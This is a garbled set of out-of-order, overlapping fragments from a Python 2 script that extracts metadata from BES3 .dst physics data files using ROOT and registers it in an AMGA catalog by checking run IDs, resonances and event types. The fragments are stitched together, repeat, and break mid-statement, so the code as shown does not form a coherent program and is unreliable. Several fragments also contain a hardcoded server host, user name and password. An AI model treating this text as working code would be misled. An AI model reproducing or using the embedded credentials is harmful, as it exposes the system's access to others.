"= re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a string",
"print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check",
"%s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values",
"value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return",
"#lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result =",
"= expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"]",
"flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size",
"status #-1 <=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"]",
"False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"]",
"first\" return Flase for item in entries: #for each entry,get its attributes in",
"getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] =",
"in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH",
"runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in",
"re import time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\")",
"exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile)",
"for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result",
"one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may",
"client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch')",
"return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH)",
"mdclient,mdinterface import string import re import time #get number behiend string \"exp\" def",
"res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] =",
"name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT",
"in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm",
"getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and",
"attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is",
"def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1",
"expNum isn't in expNumList #add this expNum to expNumList if result[3] not in",
"same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] =",
"def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if",
"rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0:",
"ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH",
"return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type):",
"attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists ==",
"= \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\"",
"items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4])",
"all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry",
"expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return",
"with name of each entry if eventType == result[0]: return True return False",
"is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1",
"Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo =",
"{} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client =",
"is in srcformat if file.endswith(format): flag = 1 return flag #Before reading information",
"'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from",
"= mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for",
"tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo",
"else: #this dst file has several runIds,get them from JobOptions by calling getRunIdList",
"= 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN",
"is empty, please run createBesDir first\" return Flase for item in entries: #for",
"be has something wrong to this file print \"serveral resonance:\",resList return False #only",
"__init__(self, format): self.format = format def __str__(self): return repr(\"the File's format is not",
"new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()')",
"expNum and resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes",
"-*- coding:utf-8 -*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst",
"#if runId in filename also is equal to runId in rootfile if attributes[\"runId\"]",
"= \"null\" #if resonance in filename is same as resonance that get from",
"if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0]",
"expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] =",
"JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList=",
"entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is",
"lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"])",
"DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all",
"is string,we need to change their style to integer for i in items:",
"= list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum,",
"calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH =",
"expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')",
"if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename",
"mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry:",
"client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2])",
"expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id",
"by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return",
"like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {}",
"re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a string",
"AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value of status",
"attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN",
"in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has",
"client.getEntry()[1] #compare eventType with name of each entry if eventType == result[0]: return",
"coding:utf-8 -*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for",
"these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in",
".dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from",
"dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get",
"\"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn",
"= lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if",
"in expNumList #add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3])",
"and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"]",
"{} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");')",
"#file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import",
"= abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i",
"flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0:",
"file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling",
"expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] =",
"str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get",
"new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] =",
"runIdList return result #get Boss version, runid, Entry number, JobOptions from root file",
"= checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return",
"#get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid",
"entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry =",
"gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();')",
"def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's format is",
"= new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"]",
"jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);')",
"= string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions):",
"from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename",
"each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and",
"like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if",
"lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one",
"= re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a",
"return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get",
"= [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if",
"format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group()",
"from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def",
"this runid between runfrm and runto,and expNum isn't in expNumList #add this expNum",
"getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"]",
"items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version,",
"in filename also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]:",
"#print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\"",
"for runid in runids: #check all runid whether between runfrm and runto of",
"in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')",
"in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType",
"return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag =",
"expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in",
"= client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result",
"attributes attributes = {} expRes = {} lfnInfo = {} runIds = []",
"%s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH = %d,but",
"True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not",
"filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag",
"if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum",
"expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is",
"lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes =",
"return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum",
"expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str =",
"in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1]",
"result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL ==",
"file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile",
"#get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members'",
"#commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for",
"return expRes #check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType):",
"in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in",
"calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"]",
"reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile =",
"by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in",
"= rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {}",
"= ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num",
"if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename",
"filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in",
"file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename",
"lfn lfn = filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format",
"that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print",
"entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None:",
"return repr(\"the File's format is not \",self.format) #type of srcformat is list,it includes",
"if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if",
"items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions",
"#get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get",
"= items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from",
"= 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name",
"= client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print",
"\"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name",
"getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1",
"gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo*",
"= str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None:",
"catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't",
"resonances,may be has something wrong to this file print \"serveral resonance:\",resList return False",
"None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH",
"= getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\"",
"\"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]:",
"root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");')",
"commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] =",
"[] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry:",
"result[0]: return True return False #judge format of file class JudgeFormat(Exception): def __init__(self,",
"= client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please run",
"is equal to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]:",
"= expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"])",
".dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of",
"\"error\" else: print \"Error %s:in the filename,runL = runH = %d,but runId in",
"= checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\"",
"entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of each",
"string,we need to change their style to integer for i in items: if",
"os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get",
"+ expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum)",
"attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is",
"rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} runIds",
"resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set",
"of status is null #-1 <=> value of streamId is null #null <=>",
"format): self.format = format def __str__(self): return repr(\"the File's format is not \",self.format)",
"according runids def getExpRes(runids): entries = [] expRes = {} expNumList = []",
"string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result",
"resList[0] else: #has several resonances,may be has something wrong to this file print",
"-1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes",
"list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in",
"we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import",
"= filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]):",
"not None: return res.group() #Get expNum and resonance from ExpSearch according runids def",
"expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance",
"evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename",
"gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch*",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is",
"rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]):",
"#this dst file has several runIds,get them from JobOptions by calling getRunIdList function",
"result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result =",
"= {} lfnInfo = {} runIds = [] #change the .dst file to",
"#if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new",
"#members' style in items is string,we need to change their style to integer",
"use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path",
"lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling",
"== lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by",
"attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and",
"attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end =",
"from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree",
"None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',')",
"wrong to this file print \"serveral resonance:\",resList return False #only including one expNum",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as",
"#if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" +",
"False: print \"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"]",
"splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only",
"- end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start",
"lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return",
"this file print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList)",
"resonance in filename is same as resonance that get from ExpSearch if expRes[\"resonance\"]",
"= 0 #print \"file\",file for format in srcformat: #if format of file is",
"= string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm and",
"runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1",
"#type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0",
"commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get",
"flag #Before reading information from .root file,we need to use changeFormat #function to",
"JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\"",
"if result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList) ==",
"min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"]",
"=(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo =",
"= lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1])",
"self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes =",
"for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag",
"flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile):",
"JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None:",
